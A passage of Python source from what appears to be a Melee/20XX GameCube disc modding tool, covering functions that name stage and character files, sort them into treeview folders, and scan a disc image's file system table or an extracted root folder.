			'GrP': 0x3C1CC0 } # Stadium

		# Parse the file name string for the custom stage index; length checks guard against
		# short names like 'GrP.usd' or extensionless names, which would otherwise raise IndexError
		if fileName.startswith( 'GrP' ) and len( fileName ) > 3 and fileName[3] in hexdigits: # For Pokemon Stadium, which follows a slighly different convention (e.g. "GrP2.usd")
			index = int( fileName[-1], 16 )
			nameOffset = tableOffsets['GrP'] + 0x50 + ( index * 0x20 )
			baseStageName = stageNameLookup['Ps.']
		elif fileName in tableOffsets and len( fileExt ) > 1 and fileExt[1] in hexdigits: # e.g. "GrSt.2at"
			index = int( fileExt[1], 16 )
			nameOffset = tableOffsets[fileName] + 0x50 + ( index * 0x20 )
			baseStageName = stageNameLookup[fullFileName[2:5]]

	return ( nameOffset, baseStageName )
def getStageName( fullFileName, parentIid, cssData ):
	""" Determines a descriptive name for a stage file.
		is20XX is a string; it's empty if we're not working with a version of 20XXHP,
		and if it is 20XX, the string can be of the form 3.03, BETA 02, 4.07++, 4.08, etc.
		The priority for this process is:
			-> Check for 'Random Neutrals' stage names
			-> Check for any other special 20XX stage files
			-> Check if it's a Target Test stage
			-> Check other vanilla file names
			-> Assign a default 'Stage file' file name if none of the above find anything """

	if globalDiscDetails['is20XX']:
		# Try to recognize stages within the set of 'Random Neutrals' (The sets of 16 stages for each legal neutral stage)
		nameOffset, baseStageName = get20xxRandomNeutralNameOffset( fullFileName )

		if nameOffset != -1:
			# Go to the address pointed to by the table, and read the string there
			customName = cssData[nameOffset:nameOffset+0x20].split('\x00')[0].decode( 'ascii' )

			# Check for convenience folders, to determine how to modify the stage description
			if parentIid == globalDiscDetails['gameId'].lower(): # No convenience folders
				# Prepend the vanilla stage name as a base for the descriptive name
				return baseStageName + ', ' + customName
			else:
				return ' ' + customName # Extra spaces added to indent the name from the stage folder name

		# Check for any other special 20XX stage files
		specialStageName = specialStagesIn20XX.get( fullFileName[2:], '' )
		if specialStageName:
			return specialStageName

	# Check for Target Test stages
	if fullFileName[2] == 'T':
		characterName = charNameLookup.get( fullFileName[3:5], '' )

		if characterName:
			# Possessive form; names already ending in 's' just get an apostrophe
			stageName = characterName + "'" if characterName.endswith( 's' ) else characterName + "'s"

			# Check if convenience folders are turned on. If they're not, this name should have more detail
			if not parentIid == 't': # Means convenience folders are not turned on
				stageName += " Target Test stage"

			return stageName

	# If still unable to determine, check vanilla file name lookups, falling back to a generic default
	return stageNameLookup.get( fullFileName[2:5], '' ) or 'Stage file'
def setStageDescriptions():
	""" Recursively walks the Disc File Tree and refreshes the description shown
		for every stage file ('Gr...' files), using names read from the CSS file. """

	cssData = getFileDataFromDiscTreeAsBytes( iid=getCssIid() )
	if not cssData: return

	# Recursively scan through all files in the treeview, and update the description/filename for stage files
	def scanFolder( parentIid='' ):
		for iid in Gui.isoFileTree.get_children( parentIid ):
			iidValues = Gui.isoFileTree.item( iid, 'values' )

			if iidValues[1] != 'file': # A folder; descend into it
				scanFolder( iid )
				continue

			fileName = iidValues[4].split( '/' )[-1] # 5th item in iidValues is isoPath
			if fileName.startswith( 'Gr' ):
				newDescription = getStageName( fileName, parentIid, cssData )
				Gui.isoFileTree.item( iid, values=[newDescription] + list( iidValues[1:] ) )

	scanFolder()
def addItemToDiscFileTree( isFolder, isoPath, entryName, entryOffset, entryLength, parent, source, data ):
	""" Adds one disc filesystem entry (a file or folder) to the Disc File Tree treeview.

		If the 'useDiscConvenienceFolders' option is off, files go directly under their native
		parent, with a descriptive string where one can be determined. If it's on, files are
		instead sorted into virtual "convenience" folders by type (stages, characters, effects,
		movies, trophies, etc.), which are created on demand the first time they're needed.

		isFolder: whether this entry is a folder native to the disc's FST
		isoPath: the entry's path within the disc; entryName: the file/folder name
		entryOffset / entryLength: the file's offset within the disc image and its size
		parent: iid of the treeview item to add this entry under (may be redirected to a convenience folder)
		source: where the file data currently resides; 'iso', 'ram', or 'path'
		data: hex string of file data (source='ram') or an external filepath (source='path') """

	description = ''
	playable_chars = ('PlCa', 'PlCl', 'PlDk', 'PlDr', 'PlFc', 'PlFe', 'PlFx', 'PlGn', 'PlGw', 'PlKb', 'PlKp', 'PlLg', 'PlLk', 'PlMr', 'PlMs', 'PlMt', 'PlNn', 'PlNs', 'PlPc', 'PlPe', 'PlPk', 'PlPp', 'PlPr', 'PlSk', 'PlSs', 'PlYs', 'PlZd') # an array with all playable character .dat names
	legal_stages = ('GrNBa', 'GrNLa', 'GrOp', 'GrPs.usd', 'GrSt', 'GrIz') # an array with all the legal stages .dat names

	if isFolder:
		if entryName == 'audio':
			description = '\t - Music and Sound Effects -'
			iconImage = Gui.imageBank( 'audioIcon' )
		else: iconImage = Gui.imageBank( 'folderIcon' )
		# The 'native' value below indicates that this folder exists in the disc's actual FST
		Gui.isoFileTree.insert( parent, 'end', iid=isoPath.lower(), text=' ' + entryName, values=(description, 'folder', 'native', '', isoPath, source, ''), image=iconImage )

	else: # This is a file.
		filenameOnly, ext = os.path.splitext( entryName )
		ext = ext.lower()

		if not generalBoolSettings['useDiscConvenienceFolders'].get():
			# Flat mode: keep the file under its native parent; just set a description for the file
			if ext in ( '.hps', '.ssm', '.sem' ) and filenameOnly in audioNameLookup:
				description = audioNameLookup[ filenameOnly ]
			elif entryName.startswith( 'Ef' ):
				if entryName == 'EfFxData.dat': description = 'Effects file for Fox & Falco. May cause desync issues.'
				else: description = 'Effects file for ' + charNameLookup[ entryName[2:4] ]
			elif entryName.startswith( 'GmRstM' ): description = 'Results screen animations for ' + charNameLookup[ entryName[6:8] ]
			elif entryName.startswith( 'GmRegend' ): description = 'Congratulations screens'
			elif ext == '.mth': # A video file
				if entryName.startswith( 'MvEnd' ): description = '1-P Ending Movie'
				elif filenameOnly in movieNameLookup: description = movieNameLookup[filenameOnly]
			elif entryName.startswith('Pl'): # Character file.
				colorKey = entryName[4:6]
				character = charNameLookup[ entryName[2:4] ]
				# Possessive form; names already ending in 's' just get an apostrophe
				if character.endswith('s'): description = character + "' "
				else: description = character + "'s "
				if colorKey == '.d': description += 'NTSC data & shared textures (Desync Warning!) Particle effects can cause desyncs.' # e.g. "PlCa.dat" / added desync warning for netplay/slippi
				elif colorKey == '.p': description += 'PAL data & shared textures (Desync Warning!) Particle effects can cause desyncs.'
				elif colorKey == '.s': description += 'SDR data & shared textures (Desync Warning!) Particle effects can cause desyncs.'
				elif colorKey == 'AJ': description += 'animation data'
				elif colorKey == 'Cp': # Kirby copy-power file; chars 6:8 name the copied character
					charName = charNameLookup[ entryName[6:8] ]
					if ']' in charName: charName = charName.split(']')[1]
					description += 'copy power (' + charName + ')'
				elif colorKey == 'DV': description += 'idle animation data'
				else: description += charColorLookup[ colorKey ] + ' costume'
				if globalDiscDetails['is20XX']: # 20XX adds 'L'/'R' alternate costume files
					if ext == '.lat' or colorKey == 'Rl': description += " ('L' alt)"
					elif ext == '.rat' or colorKey == 'Rr': description += " ('R' alt)"
			elif filenameOnly in miscNameLookup:
				description = miscNameLookup[ filenameOnly ]

			# Modify file description based on the file's region.
			if ext == '.usd' and not entryName.startswith('PlCa'): description += ' (English)'

		else:
			# Convenience-folder mode: set the file description, then add the file to its respective
			# folder (creating the folder if it doesn't already exist) by re-pointing 'parent'
			if parent.split('/')[-1] == 'audio' and validOffset( filenameOnly ): # These are 20XX's added custom tracks, e.g. 01.hps, 02.hps, etc.
				if not Gui.isoFileTree.exists('hextracks'): Gui.isoFileTree.insert(parent, 'end', iid='hextracks', text=' Hex Tracks', values=('\t- Extra 20XX Custom Tracks -', 'folder', 'notNative', '', isoPath+'/hextracks', source, ''), image=Gui.imageBank('musicIcon') )
				parent = 'hextracks'
			elif ( entryName.endswith( '.hps' ) or entryName.endswith( '.ssm' ) or entryName.endswith( '.sem' ) ) and filenameOnly in audioNameLookup:
				description = audioNameLookup[ filenameOnly ]
			elif entryName.startswith( 'Ef' ): # Character Effect files.
				if not Gui.isoFileTree.exists( 'ef' ): Gui.isoFileTree.insert(parent, 'end', iid='ef', text=' Ef__Data.dat', values=('\t- Character Graphical Effects -', 'folder', 'notNative', '', isoPath+'/Ef', source, ''), image=Gui.imageBank('folderIcon') )
				parent = 'ef'
				if entryName == 'EfFxData.dat': description = 'Fox & Falco'
				else: description = charNameLookup[ entryName[2:4] ]
			elif entryName.startswith( 'GmRegend' ): # Congratulations Screens.
				if not Gui.isoFileTree.exists('gmregend'): Gui.isoFileTree.insert(parent, 'end', iid='gmregend', text=' GmRegend__.thp', values=("\t- 'Congratulation' Screens (1P) -", 'folder', 'notNative', '', isoPath+'/GmRegend', source, ''), image=Gui.imageBank('folderIcon') )
				parent = 'gmregend'
			elif entryName.startswith( 'GmRstM' ): # Results Screen Animations
				if not Gui.isoFileTree.exists('gmrstm'): Gui.isoFileTree.insert(parent, 'end', iid='gmrstm', text=' GmRstM__.dat', values=('\t- Results Screen Animations -', 'folder', 'notNative', '', isoPath+'/GmRstM', source, ''), image=Gui.imageBank('folderIcon') )
				parent = 'gmrstm'
				description = charNameLookup[ entryName[6:8] ]
			elif entryName.startswith( 'Gr' ) and not entryName.startswith(legal_stages): # Other Stage Files. / Seperated tournament legal stages from non legal for quality of life
				# Create a folder for other stage files (if not already created)
				if not Gui.isoFileTree.exists( 'gr2' ):
					Gui.isoFileTree.insert(parent, 'end', iid='gr2', text=' Gr__.dat', values=('\t- All Other Stage Files -', 'folder', 'notNative', '', isoPath+'/Gr', source, ''), image=Gui.imageBank('stageIcon2') ) # Added secondary stage folder icon
				parent = 'gr2'

				if entryName[2] == 'T' and ( ext == '.dat' or entryName == 'GrTLg.0at' ): # This is a Target Test stage. (special case for Luigi's, since his ends in 0at)
					# Create a folder for target test stage files (if not already created)
					if not Gui.isoFileTree.exists( 't' ):
						Gui.isoFileTree.insert( parent, 'end', iid='t', text=' GrT__.dat', values=('Target Test Stages', 'folder', 'notNative', '', isoPath+'/T', source, ''), image=Gui.imageBank('folderIcon') )
					parent = 't'
				elif entryName[2:5] in onePlayerStages: # For 1-Player modes,like 'Adventure'
					if not Gui.isoFileTree.exists( '1p' ):
						Gui.isoFileTree.insert( parent, 'end', iid='1p', text='Gr___.___', values=('1P-Mode Stages', 'folder', 'notNative', '', isoPath+'/1P', source, ''), image=Gui.imageBank('folderIcon') )
					parent = '1p'
				elif globalDiscDetails['is20XX']:
					# Modern versions of 20XX (4.06+) have multiple variations of each neutral stage, the 'Random Neutrals' (e.g. GrSt.0at - GrSt.eat)
					# NOTE(review): since this whole branch excludes names starting with legal_stages, only the 'GrP' case below
					# appears reachable here (GrNBa/GrNLa/GrSt/GrIz/GrOp variants match the legal_stages branch instead) — confirm intent
					longName = None
					if entryName.startswith( 'GrP' ) and entryName[3] in hexdigits:
						shortName = 'GrP'
						longName = 'Pokemon Stadium'
					elif entryName[-3] in hexdigits: # Extension of the form '.Nat', where N is the variant's hex index
						for shortName in ( 'GrNBa', 'GrNLa', 'GrSt', 'GrIz', 'GrOp' ):
							if entryName.startswith( shortName ):
								longName = stageNameLookup.get( entryName[2:5], None ) # Vanilla file name lookups
								break
					if longName:
						iid = shortName.lower()
						if not Gui.isoFileTree.exists( iid ):
							if shortName == 'GrP':
								folderName = ' {}_.usd'.format( shortName )
							else: folderName = ' {}._at'.format( shortName )
							fullIsoPath = isoPath + '/' + shortName
							# NOTE(review): this subfolder is inserted under 'gr' (the legal-stages folder) rather than the
							# current parent 'gr2' — confirm 'gr' is guaranteed to exist by this point
							Gui.isoFileTree.insert( 'gr', 'end', iid=iid, text=folderName, values=(longName, 'folder', 'notNative', '', fullIsoPath, source, ''), image=Gui.imageBank('folderIcon') )
						parent = iid
			elif entryName.startswith(legal_stages): # Legal Stage Files / Seperated tournament legal stages from non legal for quality of life
				# Create a folder for legal stage files (if not already created)
				if not Gui.isoFileTree.exists( 'gr' ):
					Gui.isoFileTree.insert(parent, 'end', iid='gr', text=' Gr__.dat', values=('\t- Legal Stage Files -', 'folder', 'notNative', '', isoPath+'/Gr', source, ''), image=Gui.imageBank('stageIcon') )
				parent = 'gr'
			elif ext == '.mth': # a video file.
				if entryName.startswith( 'MvEnd' ): # 1-P Ending Movie.
					if not Gui.isoFileTree.exists('mvend'): Gui.isoFileTree.insert(parent, 'end', iid='mvend', text=' MvEnd__.dat', values=('\t- 1P Mode Ending Movies -', 'folder', 'notNative', '', isoPath+'/MvEnd', source, ''), image=Gui.imageBank('folderIcon') )
					parent = 'mvend'
				elif filenameOnly in movieNameLookup: description = movieNameLookup[filenameOnly]
			elif entryName.startswith(playable_chars): # Playable character file. / Seperated playable characters from non playable character for quality of life
				if not Gui.isoFileTree.exists('pl'): Gui.isoFileTree.insert(parent, 'end', iid='pl', text=' Pl__.dat', values=('\t- Playable Character Files -', 'folder', 'notNative', '', isoPath+'/Pl', source, ''), image=Gui.imageBank('charIcon') )
				charKey = entryName[2:4]
				colorKey = entryName[4:6]

				if charKey in charNameLookup:
					character = charNameLookup[ charKey ]

					# Create a folder for the character (and the copy ability files if this is Kirby) if one does not already exist.
					folder = 'pl' + character.replace(' ', '').replace('[','(').replace(']',')') # Spaces or brackets can't be used in the iid.
					if not Gui.isoFileTree.exists( folder ):
						Gui.isoFileTree.insert( 'pl', 'end', iid=folder, text=' ' + character, values=('', 'folder', 'notNative', '', isoPath+'/'+folder, source, ''), image=Gui.imageBank('folderIcon') )
					parent = folder

					# Prepare the file's description.
					if character.endswith('s'): description = character + "' "
					else: description = character + "'s "
					if colorKey == '.d': description += 'NTSC data & shared textures (Desync Warning!) Particle effects can cause desyncs.' # e.g. "PlCa.dat" / added desync warning for netplay/slippi
					elif colorKey == '.p': description += 'PAL data & shared textures (Desync Warning!) Particle effects can cause desyncs.'
					elif colorKey == '.s': description += 'SDR data & shared textures (Desync Warning!) Particle effects can cause desyncs.'
					elif colorKey == 'AJ': description += 'animation data'
					elif colorKey == 'Cp': # Kirby copy-power file; chars 6:8 name the copied character
						charName = charNameLookup[ entryName[6:8] ]
						if ']' in charName: charName = charName.split(']')[1]
						description += 'copy power (' + charName + ')'
					elif colorKey == 'DV': description += 'idle animation data'
					elif colorKey in charColorLookup: description += charColorLookup[ colorKey ] + ' costume'
					if globalDiscDetails['is20XX']: # 20XX adds 'L'/'R' alternate costume files
						if ext == '.lat' or colorKey == 'Rl': description += " ('L' alt)"
						elif ext == '.rat' or colorKey == 'Rr': description += " ('R' alt)"
			elif entryName.startswith('Pl') and not entryName.startswith(playable_chars) and entryName != 'PlCo.dat': # Other character file / Seperated playable characters from non playable character for quality of life
				if not Gui.isoFileTree.exists('pl2'): Gui.isoFileTree.insert(parent, 'end', iid='pl2', text=' Pl__.dat', values=('\t- Other Character Files -', 'folder', 'notNative', '', isoPath+'/Pl', source, ''), image=Gui.imageBank('charIcon2') )
				charKey = entryName[2:4]
				colorKey = entryName[4:6]

				if charKey in charNameLookup:
					character = charNameLookup[ charKey ]

					# Create a folder for the character (and the copy ability files if this is Kirby) if one does not already exist.
					folder = 'pl2' + character.replace(' ', '').replace('[','(').replace(']',')') # Spaces or brackets can't be used in the iid.
					if not Gui.isoFileTree.exists( folder ):
						Gui.isoFileTree.insert( 'pl2', 'end', iid=folder, text=' ' + character, values=('', 'folder', 'notNative', '', isoPath+'/'+folder, source, ''), image=Gui.imageBank('folderIcon') )
					parent = folder

					# Prepare the file's description.
					if character.endswith('s'): description = character + "' "
					else: description = character + "'s "
					if colorKey == '.d': description += 'NTSC data & shared textures (Desync Warning!) Particle effects can cause desyncs.' # e.g. "PlCa.dat" / added deync warning for netplay/slippi
					elif colorKey == '.p': description += 'PAL data & shared textures (Desync Warning!) Particle effects can cause desyncs.'
					elif colorKey == '.s': description += 'SDR data & shared textures (Desync Warning!) Particle effects can cause desyncs.'
					elif colorKey == 'AJ': description += 'animation data'
					elif colorKey == 'Cp': # Kirby copy-power file; chars 6:8 name the copied character
						charName = charNameLookup[ entryName[6:8] ]
						if ']' in charName: charName = charName.split(']')[1]
						description += 'copy power (' + charName + ')'
					elif colorKey == 'DV': description += 'idle animation data'
					elif colorKey in charColorLookup: description += charColorLookup[ colorKey ] + ' costume'
					if globalDiscDetails['is20XX']: # 20XX adds 'L'/'R' alternate costume files
						if ext == '.lat' or colorKey == 'Rl': description += " ('L' alt)"
						elif ext == '.rat' or colorKey == 'Rr': description += " ('R' alt)"
			elif entryName.startswith('Ty'): # Trophy file
				if not Gui.isoFileTree.exists('ty'): Gui.isoFileTree.insert( parent, 'end', iid='ty', text=' Ty__.dat', values=('\t- Trophies -', 'folder', 'notNative', '', isoPath+'/Ty', source, ''), image=Gui.imageBank('folderIcon') )
				parent = 'ty'
			elif filenameOnly in miscNameLookup: description = miscNameLookup[ filenameOnly ]

			# Modify file description based on the file's region.
			if ext == '.usd' and not entryName.startswith('PlCa'): description += ' (English)'

		# Add a file to the treeview (all files (not folders) besides system files should be added with the line below).
		fullPath = isoPath + '/' + entryName
		Gui.isoFileTree.insert( parent, 'end', iid=fullPath.lower(), text=' ' + entryName, values=(description, 'file', uHex(entryOffset), entryLength, fullPath, source, data) )
def scanDisc( updateStatus=True, preserveTreeState=False, updateDetailsTab=True, switchTab=True, updatedFiles=None ):
	""" Rebuilds the Disc File Tree tab's treeview from the FST (file system table) of the
		currently loaded disc image (globalDiscDetails['isoFilePath']).

			updateStatus:		update the program status bar when the scan completes
			preserveTreeState:	remember and restore open folders, selection, focus, and
								scroll position across the rescan
			updateDetailsTab:	repopulate the Disc Details tab afterwards
			switchTab:			switch the GUI to the Disc File Tree tab (unless already on
								it or on the Disc Details tab)
			updatedFiles:		iterable of file iids to highlight as recently saved """
	# A fresh scan of an actual disc image means displayed offsets are accurate; no rebuild pending
	globalDiscDetails['rebuildRequired'] = False
	if preserveTreeState:
		# Get the iids of all open folders
		openIids = []
		def getOpenFolders( openIids, parentIid='' ):
			# Recursively collects iids of all folder items currently expanded in the GUI
			# (appends to, and returns, the same shared list passed in)
			for iid in Gui.isoFileTree.get_children( parentIid ):
				if Gui.isoFileTree.item( iid, 'values' )[1] == 'folder':
					if Gui.isoFileTree.item( iid, 'open' ): openIids.append( iid )
					openIids = getOpenFolders( openIids, iid )
			return openIids
		openFolders = getOpenFolders( openIids )
		# Remember the selection, focus, and current scroll position of the treeview
		originalGameId = Gui.isoFileTree.get_children()[0] # The gameId might have been modified. If so, the file/folder selections and focus iids below will need to be updated before restoration.
		originalTreeSelection = Gui.isoFileTree.selection()
		originalTreeFocus = Gui.isoFileTree.focus()
		originalTreeScrollPosition = Gui.isoFileScroller.get()[0] # .get() returns e.g. (0.49505277044854884, 0.6767810026385225)
	if switchTab:
		currentlySelectedTab = Gui.root.nametowidget( Gui.mainTabFrame.select() )
		if currentlySelectedTab != Gui.discTab and currentlySelectedTab != Gui.discDetailsTab:
			Gui.mainTabFrame.select( Gui.discTab ) # Switch to the Disc File Tree tab
	# Clear/reset the treeview before repopulating it
	initializeDiscFileTree( not preserveTreeState )
	# Get basic info on the disc
	gameId, dolOffset, fstOffset, dolSize, fstSize, fstData, apploaderSize = getDiscSystemFileInfo( globalDiscDetails['isoFilePath'] )
	# Assemble a filesystem from the FST.
	numberOfEntries, entries, strings = readFST( fstData ) # Returns an int and two lists
	# Add the root folder
	isoPath = gameId
	parent = isoPath.lower()
	source = 'iso'
	# The 'native' value below indicates that this is a folder native to the FST
	Gui.isoFileTree.insert( '', 'end', iid=isoPath.lower(), text=' ' + gameId + ' (root)', open=True, values=('', 'folder', 'native', '', isoPath, source, ''), image=Gui.imageBank('meleeIcon') )
	# Add the system files
	Gui.isoFileTree.insert( isoPath.lower(), 'end', iid=parent + '/sys', text=' System files', values=('', 'folder', 'notNative', '', isoPath, source, ''), image=Gui.imageBank('folderIcon') )
	Gui.isoFileTree.insert( parent + '/sys', 'end', iid=parent + '/boot.bin', text=' Boot.bin', values=('Disc Header (.hdr), Part 1', 'file', '0', 0x440, isoPath+'/Boot.bin', source, '') )
	Gui.isoFileTree.insert( parent + '/sys', 'end', iid=parent + '/bi2.bin', text=' Bi2.bin', values=('Disc Header (.hdr), Part 2', 'file', '0x440', 0x2000, isoPath+'/Bi2.bin', source, '') )
	Gui.isoFileTree.insert( parent + '/sys', 'end', iid=parent + '/apploader.ldr', text=' AppLoader.ldr', values=('Executable bootloader', 'file', '0x2440', apploaderSize, isoPath+'/Apploader.ldr', source, '') )
	Gui.isoFileTree.insert( parent + '/sys', 'end', iid=parent + '/start.dol', text=' Start.dol', values=('Main game executable', 'file', uHex(dolOffset), dolSize, isoPath+'/Start.dol', source, '') )
	Gui.isoFileTree.insert( parent + '/sys', 'end', iid=parent + '/game.toc', text=' Game.toc', values=("The disc's file system table (FST)", 'file', uHex(fstOffset), fstSize, isoPath+'/Game.toc', source, '') )
	# Check whether the disc is SSBM and 20XX (and if so, gets their versions)
	checkMeleeVersion()
	check20xxVersion( entries, strings )
	# For each entry (subdirectory/file) in the ISO.
	i = 1
	dirEndIndexes = [numberOfEntries]
	totalFiles = 5 # Starts at 5 due to the system files above.
	for entry in entries[1:]: # Skips the first (root) entry.
		if programClosing: return
		else:
			# Each entry is a 0xC-byte (0x18-nibble) hex string; bytes 0x8-0xC hold
			# the file offset (or parent index for folders), 0xC-0x10 the length
			# (or next-sibling index for folders)
			entryOffset = int( entry[8:16], 16 )
			entryLength = int( entry[16:24], 16 )
			entryName = strings[i - 1]
			#print 'entry', str(i) + ':', entry[:8], entry[8:16], entry[16:24], '\t\t', hex(entryOffset), hex(entryLength), entryName
			# If the last directory has been exhausted, remove the last directory from the current path.
			while i == dirEndIndexes[-1]: # 'while' is used instead of 'if' in case multiple directories are ending (being backed out of) at once
				isoPath = '/'.join( isoPath.split('/')[:-1] )
				dirEndIndexes.pop()
			parent = isoPath.lower() # Differentiated here because parent may be changed for "convenience" folders (those not native to the ISO)
			# Differentiate between new subdirectory or file
			if entry[1] == '1':
				isoPath += '/' + entryName
				dirEndIndexes.append( entryLength ) # For folders, the length field is the index of the first entry beyond the folder
			else:
				totalFiles = totalFiles + 1
				addItemToDiscFileTree( int(entry[1]), isoPath, entryName, entryOffset, entryLength, parent, source, '' )
			# The following code is ad hoc code used occasionally for some research/testing purposes
			# iid = (isoPath+'/'+entryName).lower()
			# fileData = getFileDataFromDiscTreeAsBytes( iid=iid )
			# if not fileData:
			# 	print 'skipping disc item', entryName, '(no file data)'
			# elif entryName.startswith( 'Gr' ):
			# 	datFile = hsdFiles.datFileObj( source='disc' )
			# 	datFile.load( iid, fileData=fileData, fileName=entryName )
			# 	for structOffset, string in datFile.rootNodes:
			# 		if string == 'coll_data':
			# 			#mapHeadStruct = datFile.getStruct( structOffset )
			# 			print '\nFound coll_data for', entryName + '. length:', uHex(datFile.getStructLength( structOffset ))
			# 			#print 'offset:', uHex(0x20+mapHeadStruct.offset), ' length:', uHex(mapHeadStruct.length)
			# 			#print mapHeadStruct.data
			# 			# if mapHeadStruct.values[8] != 0:
			# 			# 	print 'Uses Array_5', mapHeadStruct.values[9]
			# 			break
			# end of test code
			i += 1
	# Now that the CSS has been loaded in the treeview, we can use it to update the stage names
	if globalDiscDetails['isMelee']: setStageDescriptions()
	# Enable the GUI's buttons and update other labels
	for widget in Gui.isoOpsPanelButtons.winfo_children():
		widget.config( state='normal' )
	Gui.isoFileCountText.set( "{:,}".format(totalFiles) )
	if updateStatus: updateProgramStatus( 'Disc Scan Complete' )
	def updateIids( iidList ):
		# Swaps the old gameId prefix for the new one in each given iid
		updatedIidList = []
		for iid in iidList:
			if '/' in iid: updatedIidList.append( gameId + '/' + '/'.join(iid.split('/')[1:]) )
			else: updatedIidList.append( iid )
		return tuple( updatedIidList )
	# Recreate the prior state of the treeview
	gameId = gameId.lower()
	if preserveTreeState:
		# Update the file/folder selections and focus iids with the new gameId if it has changed.
		if originalGameId != gameId:
			openFolders = updateIids( openFolders )
			originalTreeSelection = updateIids( originalTreeSelection )
			if '/' in originalTreeFocus: originalTreeFocus = gameId + '/' + '/'.join(originalTreeFocus.split('/')[1:])
		# Open all folders that were previously open.
		for folder in openFolders:
			if Gui.isoFileTree.exists( folder ): Gui.isoFileTree.item( folder, open=True )
		# Set the current selections and scroll position back to what it was.
		Gui.isoFileTree.selection_set( originalTreeSelection )
		Gui.isoFileTree.focus( originalTreeFocus )
		Gui.isoFileTree.yview_moveto( originalTreeScrollPosition )
	# Highlight recently updated files in green
	# NOTE(review): originalGameId below is only defined when preserveTreeState=True; callers
	# passing updatedFiles presumably always pass preserveTreeState=True as well — confirm,
	# otherwise this would raise a NameError.
	if updatedFiles:
		# Update the file iids with the new gameId if it has changed.
		if originalGameId != gameId: updatedFiles = updateIids( updatedFiles )
		# Add save highlighting tags to the given items
		for iid in updatedFiles:
			if Gui.isoFileTree.exists( iid ):
				# Add a tag to highlight this item
				Gui.isoFileTree.item( iid, tags='changesSaved' )
				# Add tags to highlight the parent (folder) items
				parent = Gui.isoFileTree.parent( iid )
				while parent != gameId:
					Gui.isoFileTree.item( parent, tags='changesSaved' )
					parent = Gui.isoFileTree.parent( parent )
	# Update the treeview's header text and its function call for the next (reversed) sort.
	Gui.isoFileTree.heading( '#0', text='File (Sorted by FST)' )
	Gui.isoFileTree.heading( '#0', command=lambda: treeview_sort_column(Gui.isoFileTree, 'file', False) )
	if updateDetailsTab: populateDiscDetails()
def promptToOpenRoot():
	""" Prompts the user to select a disc root directory (a folder of extracted disc
		files), and loads it into the program if it's valid. """
	rootPath = tkFileDialog.askdirectory(
		title='Choose a root directory (folder of disc files).',
		initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
		#parent=Gui.root,
		mustexist=True )
	# Bail if the user canceled the dialog
	if not rootPath: return
	# Validate the chosen folder (isRootFolder shows its own error messages on failure)
	if not isRootFolder( rootPath )[0]: return
	rememberFile( rootPath )
	globalDiscDetails['isoFilePath'] = rootPath
	scanRoot()
def scanRoot( switchTab=True, updateDetailsTab=True ):
	""" Populates the Disc File Tree from a disc root directory (a folder of extracted
		disc files, pointed to by globalDiscDetails['isoFilePath']), predicting file
		offsets for the disc that would be built from it. Flags the disc as requiring
		a rebuild, and optionally switches tabs and updates the Disc Details tab. """
	rootPath = os.path.normpath( globalDiscDetails['isoFilePath'] ).replace( '\\', '/' ) # Let's not deal with escape characters in our paths, shall we?
	# Make sure this is a root folder, and get the main system files
	validRootFolder, sysFolder, gcrSystemFiles = isRootFolder( rootPath )
	if not validRootFolder: return
	# Initial error checking complete. Populate the file tree
	if switchTab:
		currentlySelectedTab = Gui.root.nametowidget( Gui.mainTabFrame.select() )
		if currentlySelectedTab != Gui.discTab and currentlySelectedTab != Gui.discDetailsTab:
			Gui.mainTabFrame.select( Gui.discTab ) # Switch to the Disc File Tree tab
	initializeDiscFileTree( True )
	# Get basic info on the disc (GC Rebuilder roots combine boot.bin/bi2.bin into iso.hdr)
	if gcrSystemFiles: bootFilePath = rootPath + '/' + sysFolder + '/iso.hdr'
	else: bootFilePath = rootPath + '/' + sysFolder + '/boot.bin'
	apploaderFilePath = rootPath + '/' + sysFolder + '/apploader.ldr'
	gameId, dolOffset, fstOffset, dolSize, _, fstData, apploaderSize = getDiscSystemFileInfo( bootFilePath, apploaderPath=apploaderFilePath )
	# Add the root folder
	isoPath = gameId
	parent = isoPath.lower()
	source = 'path' # The 'native' value below indicates that this is a folder native to the filesystem
	Gui.isoFileTree.insert( '', 'end', iid=parent, text=' ' + gameId + ' (root)', open=True, values=('', 'folder', 'native', '', isoPath, source, ''), image=Gui.imageBank('meleeIcon') )
	# Add the system files
	Gui.isoFileTree.insert( isoPath.lower(), 'end', iid=parent + '/sys', text=' System files', values=('', 'folder', 'notNative', '', isoPath, source, ''), image=Gui.imageBank('folderIcon') )
	if not gcrSystemFiles:
		Gui.isoFileTree.insert( parent + '/sys', 'end', iid=parent + '/boot.bin', text=' Boot.bin', values=('Disc Header (.hdr), Part 1', 'file', '0', 0x440, isoPath+'/Boot.bin', source, rootPath + '/' + sysFolder + '/boot.bin') )
		Gui.isoFileTree.insert( parent + '/sys', 'end', iid=parent + '/bi2.bin', text=' Bi2.bin', values=('Disc Header (.hdr), Part 2', 'file', '0x440', 0x2000, isoPath+'/Bi2.bin', source, rootPath + '/' + sysFolder + '/bi2.bin') )
		totalFiles = 4
		headerFilePath = rootPath + '/' + sysFolder + '/boot.bin'
	else:
		Gui.isoFileTree.insert( parent + '/sys', 'end', iid=parent + '/iso.hdr', text=' ISO.hdr', values=('Disc Header', 'file', '0', 0x2440, isoPath+'/ISO.hdr', source, rootPath + '/' + sysFolder + '/iso.hdr') )
		totalFiles = 3
		headerFilePath = rootPath + '/' + sysFolder + '/iso.hdr'
	Gui.isoFileTree.insert( parent + '/sys', 'end', iid=parent + '/apploader.ldr', text=' AppLoader.ldr', values=('Executable bootloader', 'file', '0x2440', apploaderSize, isoPath+'/Apploader.ldr', source, apploaderFilePath) )
	Gui.isoFileTree.insert( parent + '/sys', 'end', iid=parent + '/start.dol', text=' Start.dol', values=('Main game executable', 'file', uHex(dolOffset), dolSize, isoPath+'/Start.dol', source, rootPath + '/' + sysFolder + '/start.dol') )
	# Get the offset for the FST (stored at 0x424 of the disc header)
	with open( headerFilePath, 'rb') as bootBinFile:
		bootBinFile.seek( 0x424 )
		fstOffset = toInt( bootBinFile.read( 4 ) )
	# Check whether the disc is SSBM and 20XX (and if so, gets their versions)
	checkMeleeVersion()
	check20xxVersion()
	entryOffset = 0 # This will be adjusted for each entry once the size of the FST is known.
	filenamesTooLong = []
	def loadItemsInDirectory( directory, totalFiles, entryOffset ):
		# Recursively adds the directory's files/folders to the treeview, tracking a running
		# file count and a running disc offset (relative to the start of the file data section).
		for entryName in os.listdir( directory ):
			# Bug fix: this previously returned a 4-tuple ('', 0, 0, ''), which would raise a
			# ValueError at both call sites' 2-value unpacking; return the running totals instead.
